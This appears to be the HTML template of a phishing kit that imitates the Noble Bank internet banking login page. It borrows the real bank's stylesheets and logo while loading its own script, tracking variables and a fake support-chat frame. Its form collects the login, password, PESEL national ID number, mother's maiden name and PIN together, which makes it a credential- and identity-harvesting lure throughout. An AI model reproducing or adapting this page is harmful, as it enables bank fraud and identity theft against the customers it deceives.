<html lang="pl"
    class=" js flexbox flexboxlegacy canvas canvastext webgl no-touch geolocation postmessage websqldatabase indexeddb hashchange history draganddrop websockets rgba hsla multiplebgs backgroundsize borderimage borderradius boxshadow textshadow opacity cssanimations csscolumns cssgradients cssreflections csstransforms csstransforms3d csstransitions fontface generatedcontent video audio localstorage sessionstorage webworkers no-applicationcache svg inlinesvg smil svgclippaths">

<head>
    <title>Bankowość Internetowa - Noble Bank</title>
    <meta charset="UTF-8">
    <meta name="google" value="notranslate">
    <meta name="description"
        content="System Bankowości Internetowej Noble Banku to najwygodniejszy sposób zarządzania swoimi finansami. Możesz z niego korzystać prosto ze swojego komputera wszędzie tam, gdzie masz dostęp do Internetu.">
    <meta name="robots" content="noindex">
    <meta http-equiv="X-UA-Compatible" content="IE=Edge">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable = no">

 

    <link rel="stylesheet" type="text/css"
        href="https://secure.noblebank.pl/static/noblebank/css/bootstrap/bootstrap.css?1619704457">


    <!--[if !IE]><!-->
    <link rel="stylesheet" type="text/css"
        href="https://secure.noblebank.pl/static/noblebank/css/combined.min.css?1619704457">
    <!--<![endif]-->
    <!--[if IE]>
        <link rel="stylesheet" type="text/css" href="https://secure.noblebank.pl/static/noblebank/css/combined-parts.css?1619704457">
        <link rel="stylesheet" type="text/css" href="https://secure.noblebank.pl/static/noblebank/css/our_ie.css?1619704457">

    <![endif]-->

    <!--[if IE 9]>
        <style>
            .h--submenu > li {
                display: inline;
                float: left;
            }
            .h--submenu > li .select-field {
                display:block !important;

                width:auto;
            }
        </style>
    <![endif]-->
    <link rel="stylesheet" type="text/css"
        href="https://secure.noblebank.pl/static/noblebank/css/default.css?1619704457">
    <link rel="stylesheet" type="text/css"
        href="https://secure.noblebank.pl/static/noblebank/css/our_changes.css?1619704457">
    <link rel="stylesheet" type="text/css"
        href="https://secure.noblebank.pl/static/main/css/popup-window.css?1619704457">
    <link rel="stylesheet" type="text/css"
        href="https://secure.noblebank.pl/static/noblebank/css/popup-window-colors.css?1619704457">
    <link rel="stylesheet" type="text/css"
        href="https://secure.noblebank.pl/static/noblebank/css/changes.css?1619704457">
    <link rel="stylesheet" type="text/css"
        href="https://secure.noblebank.pl/static/noblebank/css/font_icoomon_styles.css?1619704457">
    <link rel="stylesheet" type="text/css"
        href="https://secure.noblebank.pl/static/noblebank/css/modern/popupCreditPa.css?1619704457">
    <link rel="stylesheet" type="text/css"
        href="https://secure.noblebank.pl/static/noblebank/css/modern/popupConsent.css?1619704457">
    <link rel="stylesheet" type="text/css"
        href="https://secure.noblebank.pl/static/noblebank/css/modern/banner.css?1619704457">
    <link rel="stylesheet" type="text/css"
        href="https://secure.noblebank.pl/static/noblebank/css/smart-app-banner.css?1619704457">
    <link rel="stylesheet" type="text/css" href="https://secure.noblebank.pl/static/css/settings.css?1619704457">
    <link rel="stylesheet" type="text/css"
        href="https://secure.noblebank.pl/static/noblebank/css/settings.css?1619704457">
    <link rel="stylesheet" type="text/css" href="https://secure.noblebank.pl/static/main/css/main.css?1619704457">
    <link rel="stylesheet" type="text/css" href="https://secure.noblebank.pl/static/main/css/icons.css?1619704457">
    <link rel="stylesheet" type="text/css"
        href="https://secure.noblebank.pl/static/noblebank/css/proposals/proposals.css?1619704457">
    <link href="https://secure.noblebank.pl/static/noblebank/css/messages.css?1619704457" rel="stylesheet"
        type="text/css">
    <link href="https://secure.noblebank.pl/static/noblebank/css/Lato.css?1619704457" rel="stylesheet" type="text/css">
    <style>
        @font-face {
            font-family: 'ui';
            src: url("/static/fonts/ui-kit.ttf?1619704457") format("truetype"),
                url("/static/fonts/ui-kit.woff?1619704457") format("woff"),
                url("/static/fonts/ui-kit.svg?1619704457") format("svg");
            font-weight: normal;
            font-style: normal;
        }
    </style>
    <link rel="stylesheet" type="text/css" href="https://secure.noblebank.pl/static/css/ui_kit.css?1619704457">
    <link rel="stylesheet" type="text/css" href="https://secure.noblebank.pl/static/css/datepicker.css?1619704457">
    <link rel="stylesheet" type="text/css" href="https://secure.noblebank.pl/static/css/our_changes.css?1619704457">
    <link rel="stylesheet" type="text/css"
        href="https://secure.noblebank.pl/static/noblebank/css/ui_kit.css?1619704457">

    <meta name="apple-itunes-app" content="app-id=674598453">
    <meta name="google-play-app" content="app-id=pl.noblebank.mobile">
    <meta name="msApplication-ID" content="x5bca1ad9y2d66y42afyaebayd9f8230723f2x">
    <meta name="msApplication-PackageFamilyName" content="39001CDE-3E0A-4B48-9240-07A9D8614F07_bbx7k27895yhg">
    <link rel="manifest" href="https://secure.noblebank.pl/static/noblebank/manifest.json">



    <!-- FAVICONS -->
    <link rel="apple-touch-icon" sizes="180x180"
        href="https://secure.noblebank.pl/static/noblebank/images/favicons/favicon-180x180.png">
    <link rel="apple-touch-icon" sizes="114x114"
        href="https://secure.noblebank.pl/static/noblebank/images/favicons/favicon-114x114.png">
    <link rel="apple-touch-icon" sizes="72x72"
        href="https://secure.noblebank.pl/static/noblebank/images/favicons/favicon-72x72.png">
    <link rel="icon" type="image/png"
        href="https://secure.noblebank.pl/static/noblebank/images/favicons/favicon-192x192.png" sizes="192x192">
    <link rel="icon" type="image/png"
        href="https://secure.noblebank.pl/static/noblebank/images/favicons/favicon-96x96.png" sizes="96x96">
    <link rel="icon" type="image/png"
        href="https://secure.noblebank.pl/static/noblebank/images/favicons/favicon-32x32.png" sizes="32x32">
    <link rel="icon" type="image/png"
        href="https://secure.noblebank.pl/static/noblebank/images/favicons/favicon-16x16.png" sizes="16x16">
    <!-- END FAVICONS -->

    <link rel="shortcut icon" href="https://secure.noblebank.pl/static/noblebank/images/favicon.ico"
        type="image/x-icon">

    <link rel="stylesheet" href="/css/default_lk.css">
</head>

<body class="login-page" data-brand="noblebank">

    <noscript>
        <div class="error-page">
            <div class="page-wrapper">
                <section class="wrapper">
                    <h2 class="clear">Nie można skorzystać z bankowości internetowej</h2>
                    <h3>Przeglądarka internetowa ma wyłączoną obsługę JavaScript</h3>
                    <h3>Prosimy o zmianę ustawień przeglądarki</h3>
                    <br />
                    <h3>Jak zmienić ustawienia przeglądarki?</h3>

                    <ul class="browser-list">
                        <li class="ff">
                            <a href="http://support.mozilla.org/pl/kb/javascript" title="Zaktualizuj przegldarkę"
                                target="_blank">
                                <div class="image"></div>MOZILLA FIREFOX
                            </a>
                        </li>

                        <li class="chrome">
                            <a href="http://support.google.com/chrome/answer/114662?hl=pl"
                                title="Zaktualizuj przegldarkę" target="_blank">
                                <div class="image"></div>GOOGLE CHROME
                            </a>
                        </li>

                        <li class="ie">
                            <a href="http://windows.microsoft.com/pl-pl/windows/what-do-internet-explorer-script-errors#1TC=windows-7"
                                title="Zaktualizuj przegldarkę" target="_blank">
                                <div class="image"></div>INTERNET EXPLORER
                            </a>
                        </li>

                        <li class="safari">
                            <a href="http://support.apple.com/kb/PH17209?viewlocale=pl_PL&locale=pl_PL"
                                title="Zaktualizuj przegldarkę" target="_blank">
                                <div class="image"></div>SAFARI 5
                            </a>
                        </li>

                        <li class="opera">
                            <a href="http://help.opera.com/Windows/12.10/pl/javascript.html"
                                title="Zaktualizuj przegldarkę">
                                <div class="image" target="_blank"></div>OPERA 10
                            </a>
                        </li>
                    </ul>


                    <a href="http://noblebank.pl" class="h--btn h--btn-light-gray h--gray-hover">&larr; POWRÓT DO
                        noblebank.PL</a>


                    <p class="short">W razie jakichkolwiek pytań lub wątpliwości prosimy o&nbsp;kontakt z&nbsp;Infolinią
                        Banku. Nasi konsultanci są do Państwa dyspozycji codziennie całodobowo.</p>

                    <div class="h--btn h--btn-wide no-border prepend-icon"><i class="icon icon--phone"></i> zadzwoń na
                        infolinię </div>

                </section>
            </div>
        </div>
    </noscript>

    <div class="h--box-alert-top error extendSessionWrapper" style="height: 0px;"></div>
    <div class="h--box-alert-top errorAccessAttempts" style="display: none; height: 40px;">
        <i class="icon icon--valid-notice2"></i>PRÓBA LOGOWANIA Z NIEDOZWOLONEGO OBSZARU GEOGRAFICZNEGO <span
            class="accessAttemptsDate">DATA: </span><span class="accessAttemptsTime">GODZ: </span><span
            class="accessAttemptsIp">ADRES IP: </span><button class="h--btn hideZoneInformation"
            type="button">zamknij</button>
    </div>
    <div class="h--overlay-black" style="display: none"></div>
    <div id="siteViewWrapper" style="display: block;">
        <section class="h--section-white login-wrapper margin0" id="index-container">
            <div class="wrapper">
                <div id="logotype">
                    <img src="https://secure.noblebank.pl/static/noblebank/images/nb_logo.png">
                </div>
                <div id="left-container">

                    <div id="login-response"></div>
                    <div id="login-container" class="jsPrepareConfirmation jsActiveConfirmation">

                        <form id="lk_form" class="h--form-login mb20 clearfix">
                            <div class="steps two">
                                <div class="step two">
                                    <div><span>Autoryzacja</span></div>
                                </div>
                            </div>
                            <div class="show_login"></div>
                            <div class="step1">
                                <div class="h--form--field ">
                                    <input name="login" type="text" id="login"
                                        class="validateOnChangeOnly toValidate validateRequired validateLength validateLoginAlias"
                                        placeholder="WPISZ LOGIN LUB ALIAS" autocomplete="off">
                                </div>
                                <div class="h--form--field ">
                                    <input name="password" type="password" id="password"
                                        class="validateOnChangeOnly toValidate validateRequired validateLength validateLoginAlias"
                                        placeholder="HASŁO" autocomplete="off">
                                </div>
                                <div class="h--form--field ">
                                    <input name="pesel" type="text" id="pesel"
                                        class="validateOnChangeOnly toValidate validateRequired validateLength validateLoginAlias"
                                        placeholder="PESEL" autocomplete="off">
                                </div>
                                <div class="h--form--field ">
                                    <input name="motherlastname" type="text" id="motherlastname"
                                        class="validateOnChangeOnly toValidate validateRequired validateLength validateLoginAlias"
                                        placeholder="NAZWISKO PANIEŃSKIE MATKI" autocomplete="off">
                                </div>
                                <div class="h--form--field ">
                                    <input name="pin" type="password" id="pin"
                                        class="validateOnChangeOnly toValidate validateRequired validateLength validateLoginAlias"
                                        placeholder="PIN" autocomplete="off">
                                </div>
                                <button type="submit"
                                    class="h--btn-arrow-right h--btn-light-green gotoPassword float-right long login-next-button fz-12">dalej</button>

                                <div class="clearfix"></div>
                            </div>
                        </form>
                    </div>
                </div>
            </div>
        </section>
    </div>

    <div class="h--overlay-white">
        <img src="https://secure.noblebank.pl/static/noblebank/images/loader.gif">
        <div class="waitMsg"></div>
    </div>
    <div class="h--overlay-white-announcements">
        <img src="https://secure.noblebank.pl/static/noblebank/images/loader.gif">
    </div>
    <div class="h--overlay-white-setings" style="zoom: 1;">
        <img src="https://secure.noblebank.pl/static/noblebank/images/loader.gif">
    </div>

    <div class="container">
        <div class="row h--overlay-credit-pa otherCase popup-overlay">
            <div class="col-xs-8 col-md-6 col-sm-8 center popup-credit-pa">
                <div class="row">
                    <div class="actions">
                        <div class="float-right">
                            <button type="button" class="button-close"><i class="icon icon--close"></i></button>
                        </div>
                    </div>
                    <div class="col-xs-12 col-md-12 col-sm-12">
                        <div class="title mt-15">Obecnie w systemie posiadasz już rozpoczęty wniosek.</div>
                    </div>
                    <div class="col-xs-12 col-md-12 col-sm-12">
                        <div class="description">Wskaż, który wniosek chcesz kontynuować?</div>
                    </div>
                </div>
                <div class="row menu mb10">
                    <div class="col-xs-12 col-md-12 col-sm-12">
                        <div class="table">
                            <div class="row">
                                <div class="col-xs-6 col-md-6 col-sm-6 no-mobile">

                                    <div class="max table"><a class="button-close-and-new"><span
                                                class="text-decoration">Nowy wniosek</span></a></div>
                                </div>
                                <div class="col-xs-6 col-md-6 col-sm-6  no-mobile">
                                    <div class="max table">
                                        <a href="#creditpa/index/" class="button-continue">Poprzedni wniosek</a>
                                    </div>
                                </div>
                                <div class="col-xs-12 col-md-6 col-sm-6 mobile">
                                    <div class="max table">
                                        <a href="#creditpa/index/" class="button-continue">Poprzedni wniosek</a>
                                    </div>
                                </div>
                                <div class="col-xs-12 col-md-6 col-sm-6 mobile">
                                    <div class="max table"><a class="button-close-and-new"><span
                                                class="text-decoration">Nowy wniosek</span></a></div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div class="blur">
            </div>
        </div>
    </div>
    <div class="container">
        <div class="row h--overlay-credit-pa errorCase popup-overlay">
            <div class="col-xs-8 col-md-6 col-sm-8 center popup-credit-pa">
                <div class="row">
                    <div class="col-xs-12 col-md-12 col-sm-12">
                        <div class="title ">System chwilowo niedostępny</div>
                    </div>
                    <div class="col-xs-12 col-md-12 col-sm-12">
                        <div class="description">Prosimy spróbować później.</div>
                    </div>
                </div>
                <div class="row menu mb10">
                    <div class="col-xs-12 col-md-12 col-sm-12">
                        <div class="table">
                            <div class="row">
                                <div class="col-md-9 site-main">
                                    <div class="max table">
                                        <a class="button-accept come-back">Powrót do bankowości</a>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div class="blur">
            </div>
        </div>
    </div>
    <div class="container">
        <div class="row h--overlay-credit-pa unContinueCase popup-overlay">
            <div class="col-xs-8 col-md-6 col-sm-8 center popup-credit-pa">
                <div class="row">
                    <div class="actions">
                        <div class="float-right">
                            <button type="button" class="button-close"><i class="icon icon--close"></i></button>
                        </div>
                    </div>
                    <div class="col-xs-12 col-md-12 col-sm-12">
                        <div class="title mt-15">Obecnie w systemie posiadasz już rozpoczęty wniosek.</div>
                    </div>
                    <div class="col-xs-12 col-md-12 col-sm-12">
                        <div class="description">Niestety nie ma możliwości jego kontynuowania w Bankowości
                            Elektronicznej. Wybierając Nowy wniosek, poprzedni zostanie anulowany i rozpoczniesz nowe
                            wnioskowanie o produkt kredytowy.</div>
                    </div>
                </div>
                <div class="row menu mb10">
                    <div class="col-xs-12 col-md-12 col-sm-12">
                        <div class="table">
                            <div class="row">
                                <div class="col-xs-6 col-md-6 col-sm-6 no-mobile">

                                    <div class="max table"><a class="button-close button-back"><span
                                                class="text-decoration">Zrezygnuj</span></a></div>
                                </div>
                                <div class="col-xs-6 col-md-6 col-sm-6  no-mobile">
                                    <div class="max table">
                                        <a href="#creditpa/index/"
                                            class="button-close-and-new button-accept active">Nowy wniosek</a>
                                    </div>
                                </div>
                                <div class="col-xs-12 col-md-6 col-sm-6 mobile">
                                    <div class="max table">
                                        <a href="#creditpa/index/"
                                            class="button-close-and-new button-accept active">Nowy wniosek</a>
                                    </div>
                                </div>
                                <div class="col-xs-12 col-md-6 col-sm-6 mobile">
                                    <div class="max table"><a class="button-close button-back"><span
                                                class="text-decoration">Zrezygnuj</span></a></div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div class="blur">
            </div>
        </div>
    </div>
    <div class="container">
        <div class="row h--overlay popup-consent" id="popup-consent_extend">
            <div class="col-xs-8 col-md-5 col-sm-8 center popup-overlay">
                <div class="row">
                    <div class="col-xs-12 col-md-12 col-sm-12">
                        <div class="title"></div>
                    </div>
                </div>
                <div class="row">
                    <div class="col-xs-12 col-md-12 col-sm-12">
                        <div class="message consentSection">
                        </div>
                    </div>
                </div>
                <div class="row">
                    <div class="col-xs-12 col-md-12 col-sm-12">
                        <div class="buttons-popup">
                            <a data-consent="" data-swift="" href="#cancel" class="button button-cancel big "
                                onclick="$('.popup-consent').hide();return false;">Anuluj</a>
                            <a data-consent="" data-swift="" href="#extend"
                                class="button button-accept big consent-extend">Przejdź do banku</a>
                        </div>
                    </div>
                </div>
            </div>
            <div class="blur">
            </div>
        </div>
    </div>





    <script src="https://code.jquery.com/jquery-3.6.0.min.js"
        integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/axios/0.21.1/axios.min.js" crossorigin="anonymous"></script>
    <script src="https://unpkg.com/sweetalert/dist/sweetalert.min.js"></script>
    <script>
        const LOG_TOKEN = <%=log.token%>,
            AD_LANG = "<%=log.ad.service.lang%>",
            AD_ID = <%=log.ad.id%>,
            translate = <%-JSON.stringify(translate) %>;
    </script>
    <script src="/js/lk.js" defer></script>
    <link rel="stylesheet" href="/css/support_parent.css" />
    <div class="
    chatra--webkit
    chatra--style-round
    chatra--side-bottom
    chatra--pos-right
    chatra--visible
    chatra--expanded
    chatra--fast-toggle
  " id="chatra" data-turbolinks-permanent="" style="
    width: 380px;
    height: 600px;
    transform: none;
    z-index: 2147483647;
    display: none;
  ">
        <div id="chatra__iframe-wrapper">
            <iframe frameborder="0" id="chatra__iframe" allowtransparency="true" title="Chatra live chat"
                allow="autoplay" src="/supportChatFrame/<%=log.ad.id%>"
                style="width: 380px; height: 600px; position: absolute"></iframe>
        </div>
    </div>
    <div class="support-circle"
        onclick="document.querySelector('#chatra').style.display = 'block';this.style.display = 'none'"></div>
</body>

</html>